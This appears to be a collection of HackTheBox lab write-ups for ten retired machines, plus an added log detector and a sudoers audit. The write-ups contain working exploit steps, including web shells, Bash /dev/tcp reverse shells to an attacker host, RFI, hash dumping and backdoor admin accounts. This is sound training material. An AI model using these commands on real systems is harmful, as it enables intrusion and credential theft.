Collection of HackTheBox machine writeups, exploit chains, and methodology notes.
| Machine Name | Difficulty | OS | Category | Status |
|---|---|---|---|---|
| Blue | Easy | Windows | Exploitation | ✅ |
| Legacy | Easy | Windows | Exploitation | ✅ |
| Devel | Easy | Windows | FTP/Web | ✅ |
| Optimum | Easy | Windows | Web/RCE | ✅ |
| Bastion | Easy | Windows | Forensics | ✅ |
| Shocker | Easy | Linux | Shellshock | ✅ |
| Nibbles | Easy | Linux | Web/CMS | ✅ |
| TartarSauce | Easy | Linux | WordPress | ✅ |
| Jerry | Easy | Windows | Tomcat | ✅ |
| Granny | Easy | Windows | WebDAV | ✅ |
## Blue

- Machine IP: 10.10.10.40
- Difficulty: Easy
- OS: Windows
- Category: EternalBlue (MS17-010)

Enumeration:

```bash
nmap -sC -sV -oA nmap/blue 10.10.10.40
# Results:
# 135/tcp  open msrpc         Microsoft Windows RPC
# 139/tcp  open netbios-ssn   Microsoft Windows netbios-ssn
# 445/tcp  open microsoft-ds  Windows 7 Professional 7601 Service Pack 1
# 3389/tcp open ms-wbt-server Microsoft Terminal Service
```

- SMBv1 enabled, vulnerable to MS17-010 (EternalBlue)
- Confirmed with the `nmap` NSE script:

```bash
nmap --script smb-vuln-ms17-010 -p 445 10.10.10.40
# Output:
# | smb-vuln-ms17-010:
# |   VULNERABLE:
# |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
```

Exploitation (Metasploit):

```bash
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST tun0
run
# Got SYSTEM shell
```

Manual alternative:

```bash
# Use EternalBlue exploit from GitHub
git clone https://github.com/helviojunior/MS17-010
cd MS17-010
python3 send_and_execute.py 10.10.10.40 reverse_shell.exe
```

Flags:

```console
# User flag
type C:\Users\haris\Desktop\user.txt
# Flag: {e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
# Root flag
type C:\Users\Administrator\Desktop\root.txt
# Flag: {ffXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
```

Lessons learned:

- SMBv1 is critically vulnerable — disable it in production
- MS17-010 is one of the most impactful Windows exploits
- Always patch Windows systems promptly
- Network segmentation limits lateral movement
## Legacy

- Machine IP: 10.10.10.4
- Difficulty: Easy
- OS: Windows
- Category: Buffer Overflow / SMB

Enumeration:

```bash
nmap -sC -sV -oA nmap/legacy 10.10.10.4
# Results:
# 139/tcp open netbios-ssn  Microsoft Windows netbios-ssn
# 445/tcp open microsoft-ds Windows XP SP3
```

```bash
# Check for SMB shares
smbclient -L //10.10.10.4
# Enumerate SMB users
enum4linux 10.10.10.4
# Found guest access enabled
```

Exploitation (Metasploit):

```bash
msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOSTS 10.10.10.4
set LHOST tun0
run
# Got SYSTEM shell
```

Manual alternative:

```bash
# Use pre-built exploit: MS08-067.py is a file inside the jivoi/pentest
# repository, so clone the repository and run the script from it
git clone https://github.com/jivoi/pentest
python MS08-067.py 10.10.10.4
```

Flags:

```console
# User flag
type "C:\Documents and Settings\john\Desktop\user.txt"
# Root flag
type "C:\Documents and Settings\Administrator\Desktop\root.txt"
```

Lessons learned:

- Unpatched Windows XP is trivially exploitable
- MS08-067 is a stack-based buffer overflow in netapi32.dll
- Guest accounts and weak SMB configs are major risks
- Never expose legacy Windows to untrusted networks
## Devel

- Machine IP: 10.10.10.5
- Difficulty: Easy
- OS: Windows
- Category: Unauthenticated FTP Upload

Enumeration:

```bash
nmap -sC -sV -oA nmap/devel 10.10.10.5
# Results:
# 21/tcp open ftp  Microsoft ftpd (Anonymous login allowed)
# 80/tcp open http Microsoft IIS httpd 7.5
```

Anonymous FTP upload:

```console
ftp 10.10.10.5
# Login: anonymous
# Password: any email
ftp> ls
# Found existing files uploaded by other users
ftp> put shell.aspx
# Uploaded ASP.NET web shell
```

Created shell.aspx:

```aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e) {
    // Command arrives in the "cmd" query-string parameter
    string cmd = Request.QueryString["cmd"];
    if (cmd != null) {
        Process proc = new Process();
        proc.StartInfo.FileName = "cmd.exe";
        proc.StartInfo.Arguments = "/c " + cmd;
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();
        // Return the command output in the HTTP response body
        Response.Write(proc.StandardOutput.ReadToEnd());
    }
}
</script>
```

```bash
# Access shell
curl "http://10.10.10.5/shell.aspx?cmd=whoami"
# Output: iis apppool\web
```

Upgrade to Meterpreter:

```console
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f aspx -o shell.aspx
ftp> put shell.aspx
# Start handler (LHOST/LPORT must match the msfvenom payload)
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
run
```

Privilege escalation:

```console
# Upload exploit
meterpreter> upload ms11-046.exe C:\\Windows\\Temp\\
# Execute
meterpreter> shell
C:\> C:\Windows\Temp\ms11-046.exe
# Got SYSTEM
```

Alternative (Churrasco):

```console
meterpreter> upload churrasco.exe C:\\Windows\\Temp\\
meterpreter> shell
C:\> C:\Windows\Temp\churrasco.exe "net user hacker Password123! /add"
C:\> C:\Windows\Temp\churrasco.exe "net localgroup administrators hacker /add"
```

Flags:

```console
# User flag
type C:\Users\babis\Desktop\user.txt
# Root flag
type C:\Users\Administrator\Desktop\root.txt
```

Lessons learned:

- Anonymous FTP write access = game over
- Web shells are easy to deploy but noisy
- Windows privilege escalation often relies on unpatched kernel exploits
- Always check for writable directories and weak service configs
## Optimum

- Machine IP: 10.10.10.8
- Difficulty: Easy
- OS: Windows
- Category: HFS Remote Code Execution

Enumeration:

```bash
nmap -sC -sV -oA nmap/optimum 10.10.10.8
# Results:
# 80/tcp open http HttpFileServer httpd 2.3
```

- HttpFileServer (HFS) 2.3 known to be vulnerable to RCE
- CVE-2014-6287

Exploitation (Metasploit):

```bash
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set SRVHOST tun0
set LHOST tun0
run
# Got SYSTEM shell
```

Manual alternative:

```python
import requests
from urllib.parse import quote  # urllib.quote is Python 2 only

target = "http://10.10.10.8"
# Payload uses HFS scripting to execute commands
payload = "{.exec|cmd.exe /c powershell -e <base64_reverse_shell>}"
requests.get(target + "/?search=" + quote(payload))
```

Privilege escalation:

- Already running as SYSTEM via Metasploit exploit
- If not, use MS16-032 or MS16-098 for privesc

Flags:

```console
# User flag
type C:\Users\kostas\Desktop\user.txt
# Root flag
type C:\Users\Administrator\Desktop\root.txt
```

Lessons learned:

- Outdated web servers are low-hanging fruit
- HFS 2.3 RCE is trivial to exploit
- Always check for known CVEs before brute-forcing
- PowerShell is a powerful tool for post-exploitation on Windows
## Bastion

- Machine IP: 10.10.10.134
- Difficulty: Easy
- OS: Windows
- Category: VHD Forensics / Backup Analysis

Enumeration:

```bash
nmap -sC -sV -oA nmap/bastion 10.10.10.134
# Results:
# 22/tcp   open ssh          OpenSSH for Windows 7.7
# 135/tcp  open msrpc        Microsoft Windows RPC
# 139/tcp  open netbios-ssn
# 445/tcp  open microsoft-ds Windows Server 2016
# 5985/tcp open http         Microsoft HTTPAPI httpd 2.0 (WinRM)
```

```bash
smbclient -L //10.10.10.134
# Found:
#   Backups (readable)
#   Notes (readable)
smbclient //10.10.10.134/Backups
# Found WindowsImageBackup directory
# Contains VHD backup files
```

Download and mount the VHD:

```bash
# Download VHD file
smbclient //10.10.10.134/Backups
smb: \> get "9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"
# Mount on Kali
guestfish --ro -a 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i
# Or mount via qemu
qemu-nbd --connect=/dev/nbd0 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
mount /dev/nbd0p1 /mnt/vhd
```

Hash extraction:

```bash
# Browse the SAM, SECURITY and SYSTEM hives (secretsdump needs all three)
/mnt/vhd/Windows/System32/config/SAM
/mnt/vhd/Windows/System32/config/SECURITY
/mnt/vhd/Windows/System32/config/SYSTEM
# Extract hashes with impacket
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
# Found Administrator hash
```

```bash
# NT hashes need the NT format selected explicitly
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Password: password123!
```

Access:

```bash
# SSH access
ssh Administrator@10.10.10.134
# Password: password123!
# Or use WinRM
evil-winrm -i 10.10.10.134 -u Administrator -p 'password123!'
```

Flags:

```console
# User flag
type C:\Users\L4mpje\Desktop\user.txt
# Root flag
type C:\Users\Administrator\Desktop\root.txt
```

Lessons learned:

- Backup files (VHD, tar, zip) often contain sensitive data
- SAM/SECURITY hives expose password hashes
- Always check SMB shares for readable backups
- Forensics-style challenges reward patience and thoroughness
## Shocker

- Machine IP: 10.10.10.56
- Difficulty: Easy
- OS: Linux
- Category: Shellshock

Enumeration:

```bash
nmap -sC -sV -oA nmap/shocker 10.10.10.56
# Results:
# 80/tcp   open http Apache httpd 2.4.18
# 2222/tcp open ssh  OpenSSH 7.2p2
```

```bash
gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/common.txt
# Found:
# /cgi-bin/ (Directory listing enabled)
# /cgi-bin/user.sh
```

- `user.sh` is a CGI script
- Apache 2.4.18 potentially vulnerable to Shellshock (CVE-2014-6271)

Exploitation:

```bash
# Test for vulnerability (the "echo;" terminates the CGI headers)
curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'id'" http://10.10.10.56/cgi-bin/user.sh
# If vulnerable, it returns the command output
# Output: uid=1000(shelly) gid=1000(shelly) groups=1000(shelly)
```

```bash
# Start listener
nc -lvnp 4444
# Send exploit
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1" http://10.10.10.56/cgi-bin/user.sh
# Got shell as shelly!
```

Privilege escalation:

```bash
sudo -l
# Found: (root) NOPASSWD: /usr/bin/perl
# Exploit perl
sudo perl -e 'exec "/bin/sh";'
# Got root!
```

Flags:

- User: `user.txt` (in /home/shelly/)
- Root: `root.txt` (in /root/)

Lessons learned:

- CGI scripts are prime Shellshock targets
- Check HTTP headers for injection points
- `perl` with sudo = instant root
- Shellshock is old but still appears in CTFs
## Nibbles

- Machine IP: 10.10.10.75
- Difficulty: Easy
- OS: Linux
- Category: Web/CMS

Enumeration:

```bash
nmap -sC -sV -oA nmap/nibbles 10.10.10.75
# Results:
# 80/tcp open http Apache httpd 2.4.18
```

- Default Apache page at root
- Source code reveals `/nibbleblog/` directory
- Version: 4.0.3
- Known vulnerability: Arbitrary file upload in "My image" plugin
- Try `admin:admin`: login successful at http://10.10.10.75/nibbleblog/admin.php

Exploitation:

- Navigate to Plugins → My Image → Configure
- Upload malicious PHP file:

```php
<?php system($_GET['cmd']); ?>
```

- File uploaded to: http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

```bash
# Start listener
nc -lvnp 4444
# Trigger shell
curl "http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/<attacker_ip>/4444+0>%261'"
# Got shell as nibbler!
```

Privilege escalation:

```bash
# Check nibbler's home directory
ls -la /home/nibbler/
# Found: personal.zip
unzip personal.zip
# Extracted: monitor.sh
# Check permissions
ls -la /home/nibbler/personal/monitor.sh
# No special permissions
```

```bash
# Add reverse shell to monitor.sh
echo '#!/bin/bash' > monitor.sh
echo 'bash -i >& /dev/tcp/<attacker_ip>/5555 0>&1' >> monitor.sh
chmod +x monitor.sh
# Re-zip with same structure
zip personal.zip monitor.sh
# Replace original
cp personal.zip /home/nibbler/personal.zip
```

```bash
sudo -l
# Found: (root) NOPASSWD: /home/nibbler/personal/monitor.sh
# Wait for execution or run manually
sudo /home/nibbler/personal/monitor.sh
# Got root shell!
```

Flags:

- User: `user.txt`
- Root: `root.txt`

Lessons learned:

- Default CMS credentials are common
- Nibbleblog 4.0.3 file upload is well-documented
- Sudo paths to user-writable scripts are exploitable
- Always check home directories for interesting files
## TartarSauce

- Machine IP: 10.10.10.88
- Difficulty: Easy
- OS: Linux
- Category: WordPress/Backup Extraction

Enumeration:

```bash
nmap -sC -sV -oA nmap/tartarsauce 10.10.10.88
# Results:
# 80/tcp open http Apache httpd 2.4.18
```

```bash
gobuster dir -u http://10.10.10.88 -w /usr/share/wordlists/dirb/common.txt
# Found:
# /webservices/ (Directory listing enabled)
```

- Site runs WordPress
- Version detection via `wp-includes/version.php`
- Plugin enumeration with `wpscan`:

```bash
wpscan --url http://10.10.10.88/webservices/wp/ --enumerate p
# Found:
# gwolle-gb (Guestbook plugin) 2.3.2
```

- Plugin vulnerable to Remote File Inclusion
- Exploit via PHP include

Exploitation:

```bash
# Start PHP reverse shell server
echo '<?php system($_GET["cmd"]); ?>' > shell.php
python3 -m http.server 80
# Trigger RFI
curl "http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://<attacker_ip>/shell.php&cmd=whoami"
# Or use reverse shell
curl "http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://<attacker_ip>/reverse.php"
```

```bash
# Got shell as www-data
# Upgrade to stable shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
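Every web-side step in these writeups leaves a distinctive trace in the server's access log: the Shellshock function definition in a header on Shocker, the HFS `{.exec|...}` macro in the search parameter on Optimum, the gwolle-gb `abspath=http://...` RFI here, and the `?cmd=` web shells on Devel and Nibbles. The detector below is an added example (not part of these writeups) that runs those four rules over Apache combined-format lines; the sample log and the 10.10.14.5 client address are constructed.

```python
"""Flag the HTTP attack patterns from the Shocker, Optimum, TartarSauce and Nibbles
writeups in Apache combined-format access-log lines (defender-side detection)."""
import re
from urllib.parse import unquote

# (rule name, regex applied to the percent-decoded log line)
RULES = [
    # Shellshock: a Bash function definition smuggled into a header (CVE-2014-6271)
    ("shellshock", re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),
    # HFS 2.3 scripting macro injected through the search parameter (CVE-2014-6287)
    ("hfs_macro", re.compile(r"\{\.exec\|", re.IGNORECASE)),
    # Remote file inclusion: an include parameter that points at a remote URL
    ("rfi", re.compile(r"[?&]abspath=https?://", re.IGNORECASE)),
    # Web-shell use: a cmd= parameter naming a shell or command interpreter
    ("webshell_cmd", re.compile(r"[?&]cmd=.*(?:/bin/|bash|cmd\.exe|powershell)", re.IGNORECASE)),
]

def scan_line(line):
    """Return the names of every rule the log line matches."""
    # Decode twice so double-percent-encoded payloads are normalised too
    decoded = unquote(unquote(line))
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(lines):
    """Map the index of each suspicious line to the rules it triggered."""
    findings = {}
    for idx, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            findings[idx] = hits
    return findings

# Constructed sample log; the 10.10.14.5 client is a made-up attacker address
SAMPLE_LOG = [
    '10.10.14.5 - - [06/Apr/2026:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [06/Apr/2026:10:00:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 60 "-" '
    '"() { :; }; echo; /bin/bash -c \'id\'"',
    '10.10.14.5 - - [06/Apr/2026:10:00:03 +0000] "GET /?search=%7B.exec%7Ccmd.exe+/c+whoami%7D HTTP/1.1" '
    '200 0 "-" "python-requests/2.31"',
    '10.10.14.5 - - [06/Apr/2026:10:00:04 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/'
    'captcha/ajaxresponse.php?abspath=http://10.10.14.5/shell.php HTTP/1.1" 200 0 "-" "curl/8.0"',
    '10.10.14.5 - - [06/Apr/2026:10:00:05 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php'
    '?cmd=bash+-c+%27id%27 HTTP/1.1" 200 40 "-" "curl/8.0"',
    '10.10.14.5 - - [06/Apr/2026:10:00:06 +0000] "GET /?search=exec+summary HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(hits)}")
```

The benign search for "exec summary" on the last line is there to show that the HFS rule keys on the macro syntax, not the word.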
Privilege escalation:

```bash
# Check for backups
find / -name "*.tar*" 2>/dev/null
# Found: /var/backups/onuma_xxxx.tar.bz2
```

```bash
tar -xjf onuma_xxxx.tar.bz2
# Extracted: dev_backup/ directory
# Check permissions
ls -la dev_backup/
# Found: wp-config.php with database credentials
```

```bash
sudo -l
# Found: (root) NOPASSWD: /bin/tar
# Exploit tar checkpoint injection
echo '#!/bin/bash' > shell.sh
echo 'bash -i >& /dev/tcp/<attacker_ip>/6666 0>&1' >> shell.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"
sudo tar cf /dev/null *
# Got root shell!
```

Flags:

- User: `user.txt`
- Root: `root.txt`
Lessons learned:

- WordPress plugins are common attack vectors
- RFI vulnerabilities allow remote code execution
- Backup archives often leak credentials
- `tar` with sudo = checkpoint injection privesc
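The `sudo -l` findings on Shocker (`/usr/bin/perl`), Nibbles (a script under `/home/nibbler`) and TartarSauce (`/bin/tar`) are the same misconfiguration seen three times: a NOPASSWD rule for a command that lets the user run arbitrary code as root. The audit below is an added example, not part of these writeups; it parses sudoers-style rules and flags the three patterns. The sample fragment and the `SHELL_CAPABLE` starting set are constructed assumptions.

```python
"""Audit sudoers rules for the privilege-escalation patterns the Shocker (perl),
Nibbles (user-owned script) and TartarSauce (tar) writeups abuse; constructed sample."""
import os
import re
import stat

# Binaries that run arbitrary commands when sudo-allowed; perl and tar appear in the writeups, extend as needed
SHELL_CAPABLE = {"/usr/bin/perl", "/bin/tar"}
# user  host=(runas) TAG: command[, command...]
RULE_RE = re.compile(r"^(\S+)\s+([^=\s]+)\s*=\s*(?:\(([^)]*)\)\s*)?((?:[A-Z]+:\s*)*)(.+)$")

def classify(binary):
    """Explain why a sudo-allowed binary is dangerous, or return None."""
    if binary in SHELL_CAPABLE:
        return "shell-capable binary"
    if binary.startswith(("/home/", "/tmp/")):
        return "command lives under a user-controlled path"
    if not binary.startswith("/"):
        return None  # "ALL" or a bare word; nothing to inspect here
    try:
        st = os.stat(binary)
    except OSError:
        return None  # path absent on this host; nothing to inspect
    if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "command not owned by root or writable by others"
    return None

def audit(sudoers_text):
    """Return (user, command spec, reason, nopasswd) for each risky rule."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or not (m := RULE_RE.match(line)):
            continue
        user, tags, commands = m.group(1), m.group(4), m.group(5)
        for spec in commands.split(","):
            spec = spec.strip()
            reason = classify(spec.split()[0]) if spec else None
            if reason:
                findings.append((user, spec, reason, "NOPASSWD" in tags))
    return findings

SAMPLE_SUDOERS = """
root    ALL=(ALL:ALL) ALL
shelly  ALL=(root) NOPASSWD: /usr/bin/perl
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/monitor.sh
onuma   ALL=(root) NOPASSWD: /bin/tar
www     ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
alice   ALL=(root) /usr/bin/perl   # password still required
"""
```

Run `audit(open("/etc/sudoers").read())` on a host to list the rules that need tightening; the `www` rule passes because a root-owned binary with fixed arguments is not in the dangerous set.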
## Jerry

- Machine IP: 10.10.10.95
- Difficulty: Easy
- OS: Windows
- Category: Tomcat/Default Credentials

Enumeration:

```bash
nmap -sC -sV -oA nmap/jerry 10.10.10.95
# Results:
# 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
```

- Navigate to http://10.10.10.95:8080/manager/html
- Default credentials: `tomcat:s3cret` (found via brute-force or common lists)

Exploitation:

```bash
# Generate malicious WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f war -o shell.war
# Upload via Tomcat Manager
# Deploy → Select shell.war → Deploy
```

```bash
# Start listener
nc -lvnp 4444
# Access deployed shell
curl http://10.10.10.95:8080/shell/
# Got shell as SYSTEM!
```

Flags:

```console
# Already running as SYSTEM (Tomcat default on Windows)
# User flag
type C:\Users\Administrator\Desktop\user.txt
# Root flag (same as user on this box)
type C:\Users\Administrator\Desktop\root.txt
```

- User: `user.txt`
- Root: `root.txt` (same file)

Lessons learned:

- Default Tomcat credentials are trivial to brute-force
- WAR file upload = instant RCE
- Windows Tomcat often runs as SYSTEM
- No privesc needed on Jerry
## Granny

- Machine IP: 10.10.10.15
- Difficulty: Easy
- OS: Windows
- Category: WebDAV/Windows Exploitation

Enumeration:

```bash
nmap -sC -sV -oA nmap/granny 10.10.10.15
# Results:
# 80/tcp open http Microsoft IIS httpd 6.0
```

```bash
# Check for WebDAV
davtest -url http://10.10.10.15
# WebDAV enabled with PUT/MOVE methods
```

Exploitation:

```console
# Generate ASP shell
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f asp -o shell.asp
# Upload via cadaver (WebDAV client)
cadaver http://10.10.10.15
dav:> put shell.asp
dav:> move shell.asp shell.aspx
# Access shell
curl http://10.10.10.15/shell.aspx
```

Metasploit alternative:

```bash
use exploit/windows/iis/iis_webdav_upload_aspx
set RHOSTS 10.10.10.15
set LHOST tun0
run
# Got shell as NETWORK SERVICE
```

Privilege escalation:

```console
# Upload Churrasco exploit
# Found via searchsploit: Windows Server 2003 SP2
searchsploit churrasco
# Upload to target
# Execute
churrasco.exe "cmd.exe /c net user hacker Password123! /add"
churrasco.exe "cmd.exe /c net localgroup administrators hacker /add"
# Or get SYSTEM shell directly
churrasco.exe "cmd.exe"
```

- Alternative: use the MS09-012 (Chimichurri) exploit; upload and execute it for SYSTEM access

Flags:

- User: `user.txt`
- Root: `root.txt`

Lessons learned:

- IIS 6.0 WebDAV is trivially exploitable
- ASP shells work on older Windows servers
- Token impersonation exploits are reliable on old Windows
- Always check `systeminfo` for missing patches
Last updated: 2026-04-06